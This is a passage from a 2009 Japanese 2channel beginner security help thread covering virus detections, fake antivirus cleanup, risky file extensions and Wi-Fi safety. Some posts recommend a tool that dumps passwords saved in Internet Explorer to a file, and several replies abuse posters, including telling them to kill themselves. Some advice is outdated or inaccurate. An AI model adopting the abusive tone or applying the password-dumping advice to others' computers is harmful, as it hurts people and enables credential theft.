パターンファイルといっても1つではないから。
最後に使用していた2006だとウイルス、スパイ、迷惑メールの3つだったと思う。
いずれもPFWが無効になることは一度もなかった。
迷惑メールは無効設定(パターンは自動更新)にしてありました。
当然、検索エンジンうpのときは別で、さらに再起動有りでした。

ルータの無いユーザーも為にも改善してもらいたい仕様ですね。
806名無しさん@お腹いっぱい。:2009/07/31(金) 02:34:59
例えば、ウイルスがマウスなどのハードウェアに感染してて、
そのマウスを別のPCなどに差し込んだ場合に、電源入れる→デスクトップ画面→ブルー画面が出て再起動→
こういうエラーを出す場合ってあります?


807名無しさん@お腹いっぱい。:2009/07/31(金) 02:39:13
そのマウスなどに記録媒体があればな。
808名無しさん@お腹いっぱい。:2009/07/31(金) 04:24:24
gooのパスワードを忘れて、再発行の質問も忘れてしまって困っています。
インターネットのプロパティ>>閲覧の履歴の削除>>パスワードの削除 を行えるようなんですが
逆にパスワードを調べることは出来ないでしょうか?
長年使ってきたID(gooの)でなんとかパスワードを知りたいんです。
おねがいします。
809名無しさん@お腹いっぱい。:2009/07/31(金) 04:34:30
>>808
ttp://freesoftdownload.1-yo.com/security/passwordmanager/protected-storage-passview.html
810名無しさん@お腹いっぱい。:2009/07/31(金) 04:51:23
>>809
ありがとうございました。
自分はIE7なので、IE PassViewを使うことになるようなんですが、このソフトは

>IE PassView は Internet Explorer に保存されているパスワードを復元するツールです。

となっています。
復元ではなく、中身を見て、パスワードをメモしておきたいんですが、これを使ってそういうことは出来るのでしょうか?
811名無しさん@お腹いっぱい。:2009/07/31(金) 04:54:47
あの、それと、IE PassView をダウンロードして、ウイルスバスター2009でウイルスチェックすると、ウイルスだという結果になるんですが、大丈夫なんでしょうか?
812名無しさん@お腹いっぱい。:2009/07/31(金) 05:29:30
作者のサイトにスクリーンショットが有ったでしょ?
画像の通り、URL・ユーザー名・パスワードが表示される。

バスターが検出するのは悪用されたら危険だからだろう。
起動オプションを付ければ取得した情報をファイルに出力できるし。

ああ後、右クリックから「Copy〜」を選択すればコピペできるよ。
813名無しさん@お腹いっぱい。:2009/07/31(金) 06:49:57
ウイルスバスターでスキャンしてもなにもでなっかったけど
f-secureでしたらスパイウェアが5でました
なんでですか?
814名無しさん@お腹いっぱい。:2009/07/31(金) 07:23:24
2ちゃんが統一系と聞きました
だから定期的にキャッシュクリア
にしないと延々と追跡されるということです
PCと携帯の各々のキャッシュクリアの手順を教えてください
815名無しさん@お腹いっぱい。:2009/07/31(金) 09:32:22
vaioのぱそこんで
先日初期化したんだけど
ノートンのソフトが期限切れだったけど
更新して3ヶ月使用できるようになってた
これってちゃんと最新のウイルスデータに
こうしんされてるの?
816名無しさん@お腹いっぱい。:2009/07/31(金) 14:07:34
Adobe Flash Playerを新しい「10.0.32.18」にしたんだけど、
IEのアドオンの管理の所のバージョンが「8.0.20.0」になってるのは
問題ないのでしょうか?

アンインストール→PC再起動→再インストールしても8.0.20.0のままです。


プログラムの追加と削除の所と、Webでのバージョンチェックは
最新の10.0.32.18になってます。
817名無しさん@お腹いっぱい。:2009/07/31(金) 17:29:29
Shockwave Flash Objectのことなら10.0.32.18になっていないとおかしい
818名無しさん@お腹いっぱい。:2009/07/31(金) 17:58:59
>>816
インターネットオプション -> 全般 -> 閲覧の履歴 -> 設定
-> インターネット一時ファイル -> オブジェクトの表示
に古いバージョンのものがあるなら削除する。
(新しいものはそこに表示されなくても正常)
819名無しさん@お腹いっぱい。:2009/07/31(金) 20:51:02
パソコンの名前が5文字の姓名なんですが、クッキーを見たら、二文字の知らん名前になってました。
どういうことでしょうか?
820名無しさん@お腹いっぱい。:2009/07/31(金) 20:54:02
>>784
821名無しさん@お腹いっぱい。:2009/07/31(金) 21:00:12
同じ人いたんだ
でもユーザー名を作り直す気はないんですよ
ウイルスやスパイウェアじゃないなら、それでいいんです
クッキーの名前変わるのってウイルスとかのせいなんですか?
822 ◆N9P3SuvBPo :2009/07/31(金) 21:04:44
2バイト文字が原因
823名無しさん@お腹いっぱい。:2009/07/31(金) 21:13:39
5文字の漢字から2文字に変わっちゃってたけど、2文字のほうも漢字でしたけど、気にしなくていいんでしょうか?
824八頭 ◆YAGApwSaEw :2009/07/31(金) 21:17:02
ITmedia News
AdobeがFlash Player更新版をリリース、複数の脆弱性を解決 2009/7/31
Flash Player最新版では不正なPDFなどを使って悪用されていた脆弱性や、MicrosoftのATLに起因する脆弱性を解決した
同社は全ユーザーに適用を呼び掛けている
なお、脆弱性はAdobe ReaderとAcrobatにも存在することが分かっており、
こちらは米国時間の31日にリリースする更新版で対処を予定している
http://www.itmedia.co.jp/news/articles/0907/31/news024.html
アドビ - ダウンロード
ttp://www.adobe.com/jp/downloads/


higaitaisaku.com
全角ログオン名はトラブルの元です − 半角英数字のログオン名に変更しましょう
http://www.higaitaisaku.com/zenkaku.html
825名無しさん@お腹いっぱい。:2009/07/31(金) 21:26:10
全角ログオン名だけど、今のところ漢字5文字からわけわかんない漢字二文字に変わってしまってるだけで、特にトラブルはないんですよね
826名無しさん@お腹いっぱい。:2009/07/31(金) 21:46:53
HG/WEBDefenderというのが最近サイト開く度にびっくりマーク
と共に出てきてうざいんですが、これ消す方法どなたか
知りませんか?
827名無しさん@お腹いっぱい。:2009/07/31(金) 21:56:39
>>826
ttp://www.miyawan.com/925.html
これ?
828名無しさん@お腹いっぱい。:2009/07/31(金) 22:30:38
>>827
そうそうこれこれ!
ありがとう!おかげで直りました!!
マジで心から感謝します!!!
829名無しさん@お腹いっぱい。:2009/07/31(金) 22:32:52
>>828
死ね殺されろ
830名無しさん@お腹いっぱい。:2009/07/31(金) 23:12:11
>>825で安全なんでしょうか?
831名無しさん@お腹いっぱい。:2009/07/31(金) 23:35:00
>>830
うざい
死ね
自殺しろ
832名無しさん@お腹いっぱい。:2009/08/01(土) 00:33:43
>>830
>>784
833名無しさん@お腹いっぱい。:2009/08/01(土) 00:50:15
>>817
おっしゃる通り、Shockwave Flash Objectのことでした。

>>818
「オブジェクトの表示」にあったのは最新バージョンでしたが、
それを削除してアンインストーラーで完全消去して
再インストールしたらちゃんと表示が10.0.32.18になりました。

オブジェクトの表示に存在してたのが問題だった様です。
ありがとうございました。
834名無しさん@お腹いっぱい。:2009/08/01(土) 12:17:07
ブラクラではなくグロの鑑定スレってどの板にあったっけ?
分かんなくなった
835名無しさん@お腹いっぱい。:2009/08/01(土) 13:27:09
WindowsVisatはUDP 3702 TCP 5357 TCP 5358で
ファイ共有をする?らしいのですが、ルータでこれらのポートを閉じる必要はないのでしょうか?
ぐぐってもそれらを推奨、実行しているサイトがありません。
836名無しさん@お腹いっぱい。:2009/08/02(日) 02:22:40
セキュリティーのために
ネット専門PCと非ネット作業用PC分けようと思うのですが
非ネットの作業用PCにもUSBなどで外部とのデータやりとりで接触がある場合
OSやらウィルス対策ソフトの定義くらいはネット接続で更新したほうが安全でしょうか?
USBメモリもネット接続とかわらない程度の危険度はありそうで
837名無しさん@お腹いっぱい。:2009/08/02(日) 02:32:49
ネット専用PCで定期的に修正や定義ファイルを落とし、
ウイルスチェックなどを確りしてから非ネット作業PCに
持って行って適用する。
838836:2009/08/02(日) 03:00:04
>>837
ありがとう 参考になります

修正や定義ファイルをコピーして作業用PCに持っていくのですね
知識がなくその両方がどこにあるのかよくわからないのですが
場所を見つけて落としてやってみようと思います こういう使い方している方は
結構いるのでしょうか? だとすると心強いです
839名無しさん@お腹いっぱい。:2009/08/02(日) 06:34:07
http://2ch-dc.mine.nu/src/1249162340118.jpg

送信接続数が異常なんですが原因はなんでしょうか?
コモドスレではAVGのリンクスキャナが原因といわれましたが
関係なりませんでした
840名無しさん@お腹いっぱい。:2009/08/02(日) 06:43:13
何が何処へ繋いでるって画面無かったっけ?
841名無しさん@お腹いっぱい。:2009/08/02(日) 06:43:57
>>840
自分のIPだけ消してうpしますからよろしくお願いします
842839:2009/08/02(日) 06:52:11
http://2ch-dc.mine.nu/src/1249163404558.jpg
http://2ch-dc.mine.nu/src/1249163437438.jpg
IPの部分は消しました別々のポートから同じところに何度もって感じです
843839:2009/08/02(日) 07:06:17
診断君で見たremote addrとPCでみたローカルエリア接続の詳細でみたIPが違うんですが
これはどうなってるんでしょうか?串は挿していません
844名無しさん@お腹いっぱい。:2009/08/02(日) 11:42:07
>>843
ルータで接続してるならルータのWAN側のアドレスが外から見えるアドレスになる
845名無しさん@お腹いっぱい。:2009/08/02(日) 11:57:27
すいませんけど、>>825でやってても大丈夫なんでしょうか?
846名無しさん@お腹いっぱい。:2009/08/02(日) 12:53:18 BE:284907233-2BP(15)
知人のノートPCがウィルスにかかり、
"プログラムの追加と削除"や"msconfig"等システムに関する物が起動出来なくなり、
セーフモード起動しようとしても、
"STOP 0x0000007B"でブルーバックしてしまいます。
そこで、手元にKNOPIXのLiveDVDがあるので、
せめてウィルスソフトの自動実行を止めたいと思うのですが、
どうすればLinux上からWindowsのレジストリを弄る(スタートアップを弄る)事が出来ますか?
それとも別のアプローチの仕方があれば教えて頂きたいです。
847名無しさん@お腹いっぱい。:2009/08/02(日) 12:57:59
>>845
\(^^)/オワタ
848名無しさん@お腹いっぱい。:2009/08/02(日) 13:06:31
>>846
KNOPPIXのLiveDVD使ってデータ救出した後、リカバリ
849名無しさん@お腹いっぱい。:2009/08/02(日) 13:24:48
【使用OS】      『XP』 
【PCスペック】    『CPU:1.7 GHz 、メモリ:2G』
【使用ブラウザ】  『IE8』
【Microsoft Updateの更新の状態】 『自動更新
【セキュリティソフトと年式】     『何も搭載してない』
【その他スパイウェア対策ソフト】 『同上』
【回線の種類・ルータの有無】  『光回線でルーター無し』

【具体的な症状】 『yahoomail等フリーメールなどアクセスできないことが多々ある。
            サイトによっては画像が×になることが多々ある。マイクロソフトアップデートでの
            Windows XP 用セキュリティ更新プログラム (KB955069)
            Windows XP 用セキュリティ更新プログラム (KB954600)がインストールできない。』
【過程 措置】 IEを再インストール、C;のみをリカバリ、複数のオンラインチェック試行でウィルス検知無し。

850名無しさん@お腹いっぱい。:2009/08/02(日) 14:12:28 BE:854720093-2BP(15)
>>848
なんとかリカバリせずに済みそうです。
掛かってたウィルスはSystem Security 2009と名乗るもの。
症状はスタートアップでアンチウィルスソフトっぽい物が起動し、
勝手にスキャンっぽい事をして、「ウィルスに掛かってるよ、直す為にこれ買ってね」
てな感じに誘導される。壁紙も怪しい警告文に変わる。

で、KNOPPIXでWin上のファイル弄ろうとしたら、
私もファイルシステムの違いとか分からなかった\(^^)/
そういえばWinインストールディスクに回復コンソールなる物があったな、
って事で自分のディスクを入れて、ディスクからブートを忘れてそのまま起動、
あれ?変なスキャンが始まらないと思ったら、msconfigもregeditも使える。
これは勝つる!ということでタスクから奴を殺し、スタートアップから消し、
実行ファイル自体も消し、通常起動確認。

後はノーガードだった知人のPCにセキュリティソフト入れておきます。
WinインストールCDが症状を和らげたのには驚きでした。
851名無しさん@お腹いっぱい。:2009/08/02(日) 14:15:22
>>850
悪いこと言わんから素直にリカバリしとけ。
今までノーガードだったならそれだけで済む可能性は低い。
852名無しさん@お腹いっぱい。:2009/08/02(日) 16:00:12
(ο^д^)ノシ
853名無しさん@お腹いっぱい。:2009/08/02(日) 19:49:55
【使用OS】                 『XP home SP2』
【PCスペック】               『CPU: Celelon 、メモリ: 1GB』
【使用ブラウザ】             『Firefox』
【Microsoft Updateの更新の状態】  『自動更新』 
【セキュリティソフトと年式】       『avast、Bitdefender CL版』
【その他スパイウェア対策ソフト】   『spybot、spywareblaster』
【回線の種類・ルータの有無】     『ADSL回線』 

【具体的な症状】
タスクマネージャにwmiprvse.exeというプロセスがユーザー名で常駐しています
これはウィルスとみていいのでしょうか

【過程と措置】
とりあえずそのパソコンはネットにはつないでいません
854名無しさん@お腹いっぱい。:2009/08/02(日) 19:52:59
C:\Windows\System32\Wbem\wmiprvse.exe
はWindowsのWMIで使ってる正規ファイルですよ。
常駐するケースもあります。

C:\Windows\System32\wmiprvse.exe
なら怪しいですが。
855853:2009/08/02(日) 19:59:25
とりあえずそのパソコンを調べてきます
でもこのプロセスはユーザー名で常駐するものなのでしょうか?
856名無しさん@お腹いっぱい。:2009/08/02(日) 20:51:41
【使用OS】      『XP Home SP2』
【PCスペック】    『CPU:320GHz 、メモリ:384MB RAM』
【使用ブラウザ】  『IE 7』
【Microsoft Updateの更新の状態】 『自動更新かも?』
【セキュリティソフトと年式】     『McAfeeを購入して毎年自動更新』
【回線の種類・ルータの有無】  『ADSL』
【具体的な症状】
SpywareDoctorでスキャンすると、「脅威が発見されました」、となりますが、
McAfeeでスパイウェアをスキャンしても何も反応を示さず、
PCがスパイウェアに犯されているのか判断つきません。
McAfeeを信じてよいのでしょうか。

それから、セキュリティとは関係ないのですが・・・・
IE 7に更新されてからPCがとても重くなり、時にはエラーだかで
ブラウザを閉じないといけなくなります。
もとに戻すにはどのような操作をしたら良いのでしょうか。

よろしくお願いいたします。
857名無しさん@お腹いっぱい。:2009/08/02(日) 22:26:57
norton2005を使用してます。
最新定義ファイル更新情報がメールで来るようになってます。
このメールで来る回数を減らしたいのですが、
どうすればよいのでしょうか?
858名無しさん@お腹いっぱい。:2009/08/02(日) 22:28:49
norton2005を使用してます。
norton2005を使用してます。
norton2005を使用してます。
norton2005を使用してます。


m9(^Д^)プギャー
859名無しさん@お腹いっぱい。:2009/08/02(日) 22:47:34
\(^O^)/オワッタ
860名無しさん@お腹いっぱい。:2009/08/02(日) 22:50:12
>CPU:320GHz
未来のPCでつか
861名無しさん@お腹いっぱい。:2009/08/03(月) 00:58:27
小さい会社やってるんだけど、
取引先の大手企業から、
「お前のとこの情報漏洩とか、P2P対策はどうなってる?」と訪ねられて、
困ってます。
なにか手っ取り早い方法ありますか?
専門業者に頼む予算はないので
P2P実行させないフリーウェアとかあったらいいなと。
詳しい方いらっしゃったらお願いします。
862名無しさん@お腹いっぱい。:2009/08/03(月) 01:15:25
P2P対策なら、従業員さんがP2Pも含め勝手にソフトをインストールさせない管理体制を答えれば良いと思うが。
たとえば"管理者はわたしで、ほかの従業員にはユーザ権限で利用させている。"とか。
答えるだけでなく実際管理しないと。
863名無しさん@お腹いっぱい。:2009/08/03(月) 01:45:58
疑問に思うのですがカスペルスキーやF-Secureのオンラインスキャンは
どのような仕組みでPC内をスキャンしているのですか?
virustotalみたいにファイルをアップロードしているわけでもなく
スキャン中に通信が行われている様子もないので気になります
864名無しさん@お腹いっぱい。:2009/08/03(月) 02:30:00
>>861
ITmedia エンタープライズ
企業などで情報漏えい事件が発生した場合に、
信頼できる事業者を迅速に紹介する「情報漏えい防止協議会」を情報セキュリティの有識者らが設立 2009/06/15
将来的にセミナーの開催や定期的な情報交換の場も提供したい
ttp://www.itmedia.co.jp/enterprise/articles/0906/15/news047.html
ネットエージェント:NetAgent Co., Ltd.
ttp://www.netagent.co.jp/
865861:2009/08/03(月) 12:20:45
〉〉864
ありがとう。
その証明書っての良さげだね。

探したら、“P2P killer”ってのも試してみようかと。
866名無しさん@お腹いっぱい。:2009/08/03(月) 14:00:06
ネタエージェントの証明書なんか出したら、笑い物。
867名無しさん@お腹いっぱい。:2009/08/03(月) 21:28:12
(ο^д^)ノシ
868名無しさん@お腹いっぱい。:2009/08/03(月) 21:41:47
>>863
SUN JavaとかActiveXを利用して実行されている。
以前のPC内では、例えば、Excelで作ったファイルをWord に貼り付けても、Excelで編集すると
Wordに反映されただろ?OLEという仕組みだけど、それをNET越しに実現しているわけ。
WinUpDateも同じ仕組み。簡潔に言えば、NET上のファイルと自分のPC内のソフトは、境がない。
昔は、わざわざDLして、インストして、さらに実行させる、って手順を踏んだけど、自動になった。
ただね、便利になった分、悪意が入り込む要因ともなっていることを忘れずに。
869名無しさん@お腹いっぱい。:2009/08/03(月) 21:59:38
>>868
> SUN JavaとかActiveXを利用して実行されている。

どっかのオンラインスキャン用のActiveXにセキュリティホールが見つかって
狙われた事があったな
Virus Totalみたいにファイルを投げてスキャンするところは安心して使えるが
ActiveXインスコしてHDスキャンするところは常に不安が付きまとう
870名無しさん@お腹いっぱい。:2009/08/03(月) 22:10:21
カスペルの体験版をダウソしたんですが、検知したウィルスの駆除が実行できません。
悪意が潜在するプログラムと危弱性が表示されているんですが、右クリックの「全て駆除」を選択できないんです。
どうしたら駆除できるんでしょうか
871名無しさん@お腹いっぱい。:2009/08/03(月) 22:35:57
押尾のせいでスレがみれん
872名無しさん@お腹いっぱい。:2009/08/03(月) 23:45:22
>>870
マジレスすると
悪意が潜在するプログラム=ウイルスのうたがいがある。
脆弱性は修正すべきところで駆除するところではない。
ウイルスの疑いがある場合は駆除ではなく隔離。
真性ウイルス確定なら削除。
実行中のファイルは駆除、隔離、削除が出来ない。
感染後にセキュリティソフトいれても遅いです。
セキュリティソフトの基本は治療薬ではなく予防薬と考えましょう。
性質の悪いウイルスに感染したなら思い切ってリカバリしちゃいましょう。
873名無しさん@お腹いっぱい。:2009/08/03(月) 23:52:08
すいません、いくつか質問があります

exe、scb、scr、bat、com、cmd、pif、wsf、wsh、vbs、js、lnk
思いつくあたりで注意したほうがいい拡張子はこのくらいでしょうか
他にもあるのでしょうか


コントロールパネル>フォルダオプション>タグ「表示」で
「すべてのファイルとフォルダを表示する」を選び
「保護されたオペレーションシステムは表示しない」のチェックを外せば
どんなファイルでも表示されるようになるのでしょうか
874名無しさん@お腹いっぱい。:2009/08/04(火) 00:25:31
.cplもあったような気がす
875名無しさん@お腹いっぱい。:2009/08/04(火) 00:40:54
>>873
pe「Portable Excutable」がとりあえず抜けてる。これexeと同じで、標準的なWindowsの32ビットの実行可能なファイル。
あと、拡張子の表示設定ではレジストリをいじらないと表示できない項目も有るから調べれ。
876八頭 ◆YAGApwSaEw :2009/08/04(火) 00:49:41
こういう偽装には拡張子表示は役に立つかもね
ttp://a.imagehost.org/1000/v.jpg

しかし、この場合には拡張子表示だけはリスク判別が出来ない
ttp://a.imagehost.org/0206/v_1.jpg  拡張子 jpg
ttp://a.imagehost.org/0329/v_2.jpg  拡張子 ocx
ttp://a.imagehost.org/0329/v_3.jpg  拡張子 inf
ttp://a.imagehost.org/0530/v_4.jpg  拡張子 swf
877 ◆N9P3SuvBPo :2009/08/04(火) 00:58:17
878名無しさん@お腹いっぱい。:2009/08/04(火) 01:14:39
>>all
テンプレにもある「ソースチェッカーオンライン」年末で閉鎖しちゃうんだって。

残念だけど、年末まで利用させてもらうよ。
そしてありがとう。
>>877
(´ー`)ノシ
性懲りもなくま〜た意味の無い画像(と思われる)を張っている御仁が…
879ああ:2009/08/04(火) 04:33:44
ネット初心者です、さっき携帯で色々検索していたら
画像みようといたらssl認証?みたいなのになってキャンセル
ってでたけどキャンセルおし忘れ接続しちゃったけど、これなんですか?やばいです?

880名無しさん@お腹いっぱい。:2009/08/04(火) 11:20:13
やばいと言えばやばい
881名無しさん@お腹いっぱい。:2009/08/04(火) 11:53:09
>>876
今更そんなこと言われても
すごいこと言ったつもりなのか
882名無しさん@お腹いっぱい。:2009/08/04(火) 16:55:04
>>876
けぇれ
883名無しさん@お腹いっぱい。:2009/08/04(火) 19:38:26
avast4.8(データベース8月4日)で検査したところ
A0078362.exe Win32:MalOb-C[Cryp]
A0078627.exe Win32:MalOb-C[Cryp]
A0083150.exe Win32:Trojan-gen{Other}

という3つのファイルが検出されたので
ファイル名でぐぐってみたのですが誤検出かどうか具体的な情報は得られませんでした
これらは削除しても大丈夫でしょうか?
884八頭 ◆YAGApwSaEw :2009/08/04(火) 19:53:24
>>883
VirusTotal - 無料オンライン ウイルス/マルウェア スキャン (疑わしいファイルを解析するサービス)
ttp://www.virustotal.com/jp/
885 ◆N9P3SuvBPo :2009/08/04(火) 20:51:12
>883
ファイル名からして、_restoreフォルダ内からの検出ではありませんか?
886883:2009/08/04(火) 20:54:35
>>885
そうです
887 ◆N9P3SuvBPo :2009/08/04(火) 21:04:47
>886
こんなのな、システムの復元機能を無効にすれば一掃できます。
ただ、無効にしたら、それまでの復元ポイントが消滅してしまいますけど、
再度有効にすれば、新しく復元ポイントが作成されますので。
888856:2009/08/04(火) 21:11:23
すみません、>>856をお願いします。

(訂正)
【PCスペック】    『CPU:320GHz 、メモリ:384MB RAM』
→CPU:3.20GHz
889883:2009/08/04(火) 21:24:39
>>884>>887
試してみます。お二方ともありがとうございました。
890名無しさん@お腹いっぱい。:2009/08/04(火) 22:15:41
・アンチウイルスソフトによるスキャン
・アンチスパイウェアソフトによるスキャン
・タスクマネージャとa-squared HiJackFreeでプロセスの確認
・拡張子の表示

最低限やっておくべきことはこれ以外にもありますか
891名無しさん@お腹いっぱい。:2009/08/05(水) 00:33:22
>>890
フォーマットしてクリーンインストール
892八頭 ◆YAGApwSaEw :2009/08/05(水) 02:20:28
>>856
SpywareDoctorでの検出名と検出箇所はわかる?
なかなか検出力もいいらしいけど、ちょくちょく誤検出もあるからね


>>890
・アンチウイルスソフトによるスキャン  ←  1年間常駐保護してくれるセキュリティが一番重要
・アンチスパイウェアソフトによるスキャン  ←  ここ(セカンドスキャナ)はフリーになると思うけど、やる気の無いベンダが多数なのが現実
・タスクマネージャとa-squared HiJackFreeでプロセスの確認  ←  初心者にしては良い習慣だと思う (greatis.comなども参考に)
・拡張子の表示  ←  ネット経由入手のファイルなどは、まずvirustotal.comをくぐらせる習慣(複数のスキャナでチェック)もすべき

>>3に紹介している、信頼出来る最新ニュースメディアも定期購読する習慣をつける。(個人サイトの情報は内容がやや古いままの場合が多い)
長くなるんでNortonスレのテンプレをw
http://pc11.2ch.net/test/read.cgi/sec/1248903246/7-8
893890:2009/08/05(水) 03:15:14
>>892
ありがとうございました。
894名無しさん@お腹いっぱい。:2009/08/05(水) 15:25:51
MS-DOSウィルスとはどんなウィルスですか
895名無しさん@お腹いっぱい。:2009/08/05(水) 19:53:54
いつの間にかレジストリのファイル(拡張子.reg)の、既定のプログラムがメモ帳になってたんですが、
これってウィルス感染したような形跡でしょうか?
896 ◆N9P3SuvBPo :2009/08/05(水) 23:41:07
>894
昔のウイルスっす

>895
感染ではありません
>いつの間にかレジストリのファイル(拡張子.reg)の、既定のプログラムがメモ帳になってたんですが
こうなる前に行なった操作を思い出してください。
897894:2009/08/06(木) 00:52:20
>>896
まず無いという感じはしますが
今ではMS-DOSウィルスにはどんな感染経路があるのでしょうか
898名無しさん@お腹いっぱい。:2009/08/06(木) 01:21:20
>>897
MS-DOSウイルス(ブートセクタウイルス)
http://www.mcafee.com/japan/security/virushistory.asp
899名無しさん@お腹いっぱい。:2009/08/06(木) 11:18:40



          [ 便利 ] 2ch専用ブラウザ [ 推奨 ]   


900894:2009/08/06(木) 18:24:58
>>898
ありがとうございます
901名無しさん@お腹いっぱい。:2009/08/06(木) 19:34:59
ダウンロードした圧縮ファイルにウイルスチェックしたらトロイの木馬が検出されたので
解凍せずゴミ箱に入れて消去したのですが、これってセーフなのですか?
一応全スキャンしましたが検出されなかったです

使っていたソフトはAVG8.5です
902名無しさん@お腹いっぱい。:2009/08/06(木) 20:05:06
>>901
だいじょぶ心配無い
903名無しさん@お腹いっぱい。:2009/08/06(木) 20:07:07
>>902
ありがとう、初心者なので心配でした
904名無しさん@お腹いっぱい。:2009/08/06(木) 20:11:47
>>903
解凍する前にスキャンしてよかったね
モノによっては誤検出の可能性もあるけど破棄するのが得策でしょう
905名無しさん@お腹いっぱい。:2009/08/06(木) 20:58:52
圧縮ファイルにウイルスが入っていた場合
コピーや移動はセーフなんですよね?
906名無しさん@お腹いっぱい。:2009/08/06(木) 21:29:55
無線LANのセキュリティ問題について右も左もわからないので教えてください

大学の図書館で無線LANに接続しているんですが、パスワード等のリクエストを傍受されないか心配です

FTPでレンタルサーバーに接続したり
アマゾン等でクレジットカードの番号を入力することもあるのですが危険でしょうか

WindowsUpdateとウイルス定義パタンの更新は随時おこなっています

Windowsのコントロールパネル>ワイヤレスネットワークの管理>プロパティでは、
アクセスポイントが
セキュリティの種類:認証なし(オープンシステム
暗号化の種類:なし
になっています

コントロールパネル>ネットワークとセキュリティセンター>共有と探索
の項目はすべて無効にしています

大学のHPで係るFAQを見ましたが、各自ウイルス対策ソフトをいれてください
くらいしか書かれていません
http://web.mita.keio.ac.jp/info/security.html
907名無しさん@お腹いっぱい。:2009/08/06(木) 22:25:06
尼はSLLで暗号化してるだろう。
FTPはオワタだと思うけどそれなら有線でも同じ事。無線とかは関係ないないよ。
908名無しさん@お腹いっぱい。:2009/08/06(木) 22:52:25
>>905
大丈夫です。
909名無しさん@お腹いっぱい。:2009/08/07(金) 14:20:59
VirtualPCを使うにはもう1つOSを購入すする必要があるのですか
910名無しさん@お腹いっぱい。:2009/08/07(金) 17:15:19
>>909
Ubuntuでも入れとけ。
911名無しさん@お腹いっぱい。:2009/08/07(金) 21:28:06
>>910
909ではないですが
ttp://www.ubuntulinux.jp/products/JA-Localized/vmware
ウイルスファイルを敢えて起動する実験はこのページの仮想OSを使えば良いのでしょうか
912名無しさん@お腹いっぱい。:2009/08/07(金) 21:31:40
LinuxでWindowsのウイルスは動かんだろ。
MSがIE8検証用のVPCイメージを公開してるからそれ使えば?
913名無しさん@お腹いっぱい。:2009/08/07(金) 21:34:53
windows operating system にUDPで接続してくるIPがあるんですが
これは進入されてるんえすか?
914名無しさん@お腹いっぱい。:2009/08/07(金) 23:21:37
自宅に以下のようなネットワークがあります。

モデム
 |
ルーター1 − PC1
 |
ルーター2 − PC2

ルーター1とルーター2はネットワークが異なっていてPC1とPC2は同一LAN上にはありません。
このようなネットワーク上で、PC1がウィルスに感染した場合、PC1からPC2に感染する可能性はあるでしょうか?
915名無しさん@お腹いっぱい。:2009/08/08(土) 10:26:49
>>914
あるよ
916名無しさん@お腹いっぱい。:2009/08/08(土) 13:45:18
PCを起動するとWindowsDefenderがPWS:WIN32/Daurso.Aというのを検出します
そのたびに除去しているのですが、PCを再起動するたびにまた検出します
全スキャンしても状況が変わらないのですが、どうすればよいでしょうか?
よろしくお願いします
917名無しさん@お腹いっぱい。:2009/08/08(土) 13:46:32
>>916
テンプレに沿う事
918名無しさん@お腹いっぱい。:2009/08/08(土) 16:06:00
失礼しました

【使用OS】     WinXP
【PCスペック】    CPU: 2GHz 、メモリ: 2GB
【使用ブラウザ】 Fx3
【Microsoft Updateの更新の状態】 自動更新設定
【セキュリティソフトと年式】     AVGFree8.5
【その他スパイウェア対策ソフト】 WindowsDefender
【回線の種類・ルータの有無】  光回線でルータ

【具体的な症状】 
PCを起動するとWindowsDefenderがPWS:WIN32/Daurso.Aというのを検出します
そのたびに除去しているのですが、PCを再起動するたびにまた検出します
全スキャンしても状況が変わらないのですが、どうすればよいでしょうか?
よろしくお願いします
919八頭 ◆YAGApwSaEw :2009/08/08(土) 16:28:24
>>918
これのことかな?
ttp://i31.tinypic.com/sxkb46.jpg
どこの場所から検出しているか分かる?
とりあえず対応済みなものだから・・・
IPA 情報処理推進機構
@「 USB メモリのセキュリティ対策を意識していますか? 」 Windows の自動実行(オートラン)機能を無効にする → PC再起動
ttp://www.ipa.go.jp/security/txt/2009/05outline.html
AAVGの検疫を手動処理 → ◆N9P3SuvBPoが教えてくれるだろう
920名無しさん@お腹いっぱい。:2009/08/08(土) 16:58:04
どこで検出しているかわからないです
USBメモリも特につないでいないのですが・・・・・・・
検出場所の捜索方法ってあるんですか?
WindowsDefenderのログあさっているんですがよくわかりません・・・・
921名無しさん@お腹いっぱい。:2009/08/08(土) 18:27:42
【使用OS】      『XP home sp2』 
【PCスペック】    『CPU:2GHz 、メモリ:2GB』  
【使用ブラウザ】  『firefox』 
【Microsoft Updateの更新の状態】 『自動更新設定』 
【セキュリティソフトと年式】    AVG8.5 bitdefenderコマンドライン
【その他スパイウェア対策ソフト】 spybot

bitdefenderのコマンドライン版を使っていて疑問に思うことが2つありました

疑問その1
exeファイルをbitdefenderのコマンドライン版でスキャンすると
そのファイル1つだけスキャンして「files 1」で終わる場合と
exeファイル内のファイルを全部検査してくれる場合がありますが
色々なフリーソフトのインストールexeを試しましたが
同じexeファイルでも何か違いがあるのでしょうか

疑問その2
圧縮ファイルやイメージファイルの形式によっては中身まで検査してくれないことが
あるのでしょうか?もしその圧縮ファイルだけしか検査しなかった場合は中にウイルスが
潜んでいる可能性があるのですか
922名無しさん@お腹いっぱい。:2009/08/08(土) 19:50:56
>>919
>これのとこかな?
そんなもん見せても初心者がわかるはずないだろ。
もうちょっと考えろ
923名無しさん@お腹いっぱい。:2009/08/09(日) 00:49:19
リカバリをすることになりますた
何かデータとか全部外付けにコピーするの面倒なのですが
これはしょうがないんですか?

・ブラウザのお気に入りの内容
・2chビュアー
・バイナリいじったツール
・ゲームのデータ
・画像や音楽

全部コピーしないといかんのですか?
リカバリ作業補助ツールみたいなのありますか?
924名無しさん@お腹いっぱい。:2009/08/09(日) 01:05:04
ttp://image.blog.livedoor.jp/samenicof/imgs/6/9/694bc0de.jpg
925八頭 ◆YAGApwSaEw :2009/08/09(日) 01:38:33
>>920
IPA 情報処理推進機構
@Windows の自動実行(オートラン)機能を無効にする ※USBの使用に関わらず設定しておくこと
ttp://www.ipa.go.jp/security/txt/2009/05outline.html
Ahigaitaisaku.com Windowsをセーフモードで起動
http://www.higaitaisaku.com/safemode.html
BAVGでフルスキャンして駆除

>>921
Bit本スレへ

>>923
バックアップなんだからしょうがない
926名無しさん@お腹いっぱい。:2009/08/09(日) 01:39:43
面倒ならバックアップしないでリカバリすれば?
別に俺のPCじゃないし
927名無しさん@お腹いっぱい。:2009/08/09(日) 02:49:13
>>926
頭大丈夫?
君自分がレスする前に一分くらい自分のレスについて自問自答したほうが良いよ

多分リアルでの生活でもそういうところが人に嫌われてると思うからw
928名無しさん@お腹いっぱい。:2009/08/09(日) 02:52:12
期待通りの回答が無くてざまぁw
929八頭 ◆YAGApwSaEw :2009/08/09(日) 03:31:42
そういや電気屋に並んでたよ

